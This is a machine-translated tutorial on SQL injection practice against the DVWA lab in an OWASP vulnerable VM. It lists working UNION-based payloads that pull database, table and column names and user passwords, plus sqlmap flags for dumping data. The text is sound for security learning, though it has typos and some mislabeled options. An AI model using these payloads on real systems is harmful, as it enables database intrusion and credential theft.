Technology Sharing

한어Русский языкEnglishFrançaisIndonesianSanskrit日本語DeutschPortuguêsΕλληνικάespañolItalianoSuomalainenLatina

1. Security Penetration

1.1 Classification

• Web database security
• Web application server security (file upload vulnerability, file inclusion vulnerability)
• Web client security (XSS cross-site attack)

2. SQL injection

2.1 Introduction to SQL injection

• SQL injection tops the list of security issues
• SQL injection attack is when the input parameters are not filtered and then directly spliced ​​into the SQL statement for parsing.
• SQL injection is an attack method that adds SQL code to input parameters and passes it to the server for parsing and execution.

2.2 SQL injection principle

• The attacker submits malicious characters on the page
• The server does not filter the submitted parameters or the filtering is insufficient
• Attackers use splicing SQL statements to obtain sensitive information from the database

2.3 SQL injection hazards

• Database Leak
• User data is illegally bought and sold
• Compromise web application security

2.4 SQL injection implementation method

• Manual
  • Find: Injection Point
  • Input: SQL commonly used injection combination syntax, injection
• Automatic (Tool)
  • Tool: Scan for injection points
  • Input: Automatically try various combination syntaxes

3. Environment Construction

3.1 VMware virtual machine

3.1.1 Function

• Virtual machine software, you can use the software to install multiple virtual operating systems (Linux, Windows) on a physical machine
• Target machine and penetrant run VMware software
  VMware Download Tutorial

3.2 Target drone (learning to use the project environment)

effect

• A Linux virtual machine system, in which some web applications with known vulnerabilities are installed for easy learning
• OWASP Target Machine Installation Tutorial

3.3 Penetration Machine (Learning to Attack SQL Injection Environment)

effect:

• Kali contains hundreds of tools that can be used for a variety of information security tasks, such as penetration testing, security research

4. Manual injection

4.1 Environmental Preparation

Description: Practice manual injection through the target web application
step:

• Start the target machine OWASP
  

• Access the target machine through a browser

• Visit OWASP-dvwa project
  

• Login
  

• Select sql injection application
  

4.2 Finding the injection point

Note: Single quotes are mainly used, escape characters are mainly single quotes
principle:

#后台程序sql语句
select first_name,last_name from users where user_id = '$id';
#输入单引号('),相当于将sql语句闭合，后面就可以使用附加其他逻辑条件了
select first_name,last_name fro users where user_id = ''';
1
2
3
4

4.3 Logical OR

4.4 Guessing the number of columns

1. Through union

' union select 1,2 #
1

2. Through logical OR

'or 1=1#
1

4.5 Get database, table, column

Get the database name

' union select 1,database()#
1

Get Table

' union select table_name,1 from information_schema.tables where table_schema='dvwa' #
1

Get Columns

' union select column_name,1 from information_schema.columns where table_name='users' #
1

4.6 Get Data

//1. 获取单个字段数据
' union select user,1 from users#

//2. 获取两个字段
' union select user,password from users#
1
2
3
4
5

4.7 concat function

Function: concatenate multiple strings into one string
Syntax: concat(str1,str2,…)
Example:

• Get user_id, user, password in the users table and display them in two columns

select user_id,concat (user,password) from dvwa,users;
1

• Solve the problem of splicing user and password together

select user_id,concat('user:',user,' password:',password) from dvwa.users;
1

• Get multiple fields

' union select user,concat(first_name,' ',last_name,' ',password) from users#
1

5. Automatic injection

5.1 Introduction to automatic injection

Note: Automatic injection refers to using tools to replace manual SQL injection operations.
Tool: sqlmap

5.2 Automatic injection environment

• Start the target drone
• Start the infiltration machine

5.3 sqlmap

Tool: sqlmap

• An open source penetration testing tool
• Automatically detect and exploit SQL injection vulnerabilities and take over database servers
  

5.3.1 Basic usage of sqlmap

parameter

• -u: scan target url
• –batch: automatically process prompt information
• –cookie: Additional cookie parameters

step

• Scan injection points
• Get the database name
• Get table name
• Get field name
• retrieve data

Since we need to log in, we first get the cookie of the logged in page

Then start scanning the injection point

Successful injection

5.3.2 sqlmap obtains the library name

– current-db: query the database name currently used by the web
-D: Apply the specified database

operation result:

5.3.3 sqlmap obtains table

– current-db: query all table names under the specified database (you need to use -D to specify the database name first)
-T: specify table

operation result:

5.3.4 sqlmap get column

– columns: query all fields under the specified table (you need to use -T to specify the table name first)
-C: Specify the field name

operation result:

5.3.5 sqlmap obtains data

–dump: download data

operation result: